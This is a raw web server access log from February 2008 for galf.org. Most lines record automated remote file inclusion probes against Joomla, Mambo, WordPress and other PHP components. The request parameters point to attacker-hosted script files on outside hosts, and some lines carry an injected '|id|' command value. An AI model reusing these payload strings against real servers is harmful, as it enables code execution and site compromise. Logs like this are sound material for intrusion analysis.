193.252.3.200 - - [10/Feb/2008:20:42:22 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.69.192.133 - - [10/Feb/2008:20:43:14 -0800] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
208.69.192.133 - - [10/Feb/2008:20:43:14 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
208.69.192.133 - - [10/Feb/2008:20:43:14 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.106.131.26 - - [10/Feb/2008:20:48:34 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
87.106.131.26 - - [10/Feb/2008:20:48:34 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
81.177.16.41 - - [10/Feb/2008:20:56:22 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?&mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
81.177.16.41 - - [10/Feb/2008:20:56:22 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?&mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
208.68.175.66 - - [10/Feb/2008:20:58:02 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:20:58:02 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:21:04:29 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:21:04:29 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:21:11:58 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.9.152.104 - - [10/Feb/2008:21:11:58 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.75.63.66 - - [10/Feb/2008:21:14:52 -0800] "GET /logs/access_070709.log/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:21:14:52 -0800] "GET /index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:21:14:52 -0800] "GET /logs/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:21:15:37 -0800] "GET /logs/access_070709.log/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:21:15:38 -0800] "GET /index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:21:15:38 -0800] "GET /logs/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.23.106 - - [10/Feb/2008:21:16:48 -0800] "GET /logs/access_071203.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:21:17:04 -0800] "GET /logs/access_070709.log/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:21:17:05 -0800] "GET /index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:21:17:05 -0800] "GET /logs/index1.php?sida=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.73.165 - - [10/Feb/2008:21:19:53 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://crank.idoo.com/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
87.106.73.165 - - [10/Feb/2008:21:19:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://crank.idoo.com/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:21:20:36 -0800] "GET /logs/index.php?arquivo=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:21:20:36 -0800] "GET /index.php?arquivo=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:21:21:03 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:21:21:03 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.152.104 - - [10/Feb/2008:21:23:00 -0800] "GET /logs/access.log/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.9.152.104 - - [10/Feb/2008:21:23:00 -0800] "GET /logs/access.log/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.9.152.104 - - [10/Feb/2008:21:23:00 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.9.152.104 - - [10/Feb/2008:21:23:00 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
213.203.143.131 - - [10/Feb/2008:21:23:07 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:21:23:08 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:21:23:27 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.75.63.66 - - [10/Feb/2008:21:23:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.75.63.66 - - [10/Feb/2008:21:23:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
89.149.242.162 - - [10/Feb/2008:21:24:45 -0800] "GET /logs//pacercms/http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
89.149.242.162 - - [10/Feb/2008:21:24:46 -0800] "GET //pacercms/http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:21:26:55 -0800] "GET //admin/includes/admin_header.php?level=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.203.143.131 - - [10/Feb/2008:21:30:12 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
213.203.143.131 - - [10/Feb/2008:21:30:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
213.203.143.131 - - [10/Feb/2008:21:30:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
202.171.48.7 - - [10/Feb/2008:21:36:29 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:21:36:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:21:39:17 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
202.171.48.7 - - [10/Feb/2008:21:39:18 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
202.171.48.7 - - [10/Feb/2008:21:39:18 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.6.25.146 - - [10/Feb/2008:21:39:42 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
216.55.166.250 - - [10/Feb/2008:21:40:06 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [10/Feb/2008:21:40:06 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [10/Feb/2008:21:40:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.106.19.18 - - [10/Feb/2008:21:47:21 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.19.18 - - [10/Feb/2008:21:47:22 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.19.18 - - [10/Feb/2008:21:47:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.138.141.146 - - [10/Feb/2008:21:48:42 -0800] "GET /logs/access.log//admin/includes/admin_header.php?level=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
83.138.141.146 - - [10/Feb/2008:21:48:42 -0800] "GET /logs//admin/includes/admin_header.php?level=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
69.93.164.74 - - [10/Feb/2008:21:49:26 -0800] "GET /logs/access_070806.log/http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:49:26 -0800] "GET /http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:49:26 -0800] "GET /logs/http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.88.90 - - [10/Feb/2008:21:50:37 -0800] "GET /logs/http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.88.90 - - [10/Feb/2008:21:50:38 -0800] "GET /http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:50:49 -0800] "GET /logs/access_070709.log/http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:51:03 -0800] "GET /http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:53:01 -0800] "GET /logs/http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:21:53:01 -0800] "GET /http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:21:53:25 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.189.222.164 - - [10/Feb/2008:21:53:35 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.189.222.164 - - [10/Feb/2008:21:53:36 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.189.222.164 - - [10/Feb/2008:21:53:36 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.189.222.164 - - [10/Feb/2008:21:54:39 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.189.222.164 - - [10/Feb/2008:21:54:39 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.189.222.164 - - [10/Feb/2008:21:54:40 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
68.149.224.227 - - [10/Feb/2008:21:58:04 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
68.149.224.227 - - [10/Feb/2008:21:58:05 -0800] "GET /components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
68.149.224.227 - - [10/Feb/2008:21:58:06 -0800] "GET /logs/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
74.6.28.73 - - [10/Feb/2008:21:58:43 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.67.21.65 - - [10/Feb/2008:21:58:56 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=%7Cid%7C HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.21.65 - - [10/Feb/2008:21:58:56 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=%7Cid%7C HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.21.65 - - [10/Feb/2008:21:58:56 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=%7Cid%7C HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:00:17 -0800] "GET /logs/access_070806.log//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:00:17 -0800] "GET //?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:00:17 -0800] "GET /logs//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 6062 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:00:17 -0800] "GET /logs/access_070709.log//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [10/Feb/2008:22:00:56 -0800] "GET /logs/access_070806.log//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [10/Feb/2008:22:00:57 -0800] "GET //?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [10/Feb/2008:22:00:57 -0800] "GET /logs//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 6062 "-" "libwww-perl/5.808" "www.galf.org"
209.97.199.252 - - [10/Feb/2008:22:00:57 -0800] "GET /logs/access_070709.log//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:01:06 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:01:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:01:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.108.66.182 - - [10/Feb/2008:22:01:43 -0800] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:02:27 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:02:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:02:27 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:02:57 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:02:58 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:02:58 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:03:12 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.10.15 - - [10/Feb/2008:22:03:13 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laultimapeseta.com//lang/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:04:05 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:04:06 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:04:06 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:04:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.163.220 - - [10/Feb/2008:22:04:44 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.194.71.79 - - [10/Feb/2008:22:06:57 -0800] "GET //?mosConfig_absolute_path=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
82.194.71.79 - - [10/Feb/2008:22:06:57 -0800] "GET /logs//?mosConfig_absolute_path=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 200 6062 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:19 -0800] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:21 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:25 -0800] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:25 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:26 -0800] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:27 -0800] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:27 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:33 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:34 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:36 -0800] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
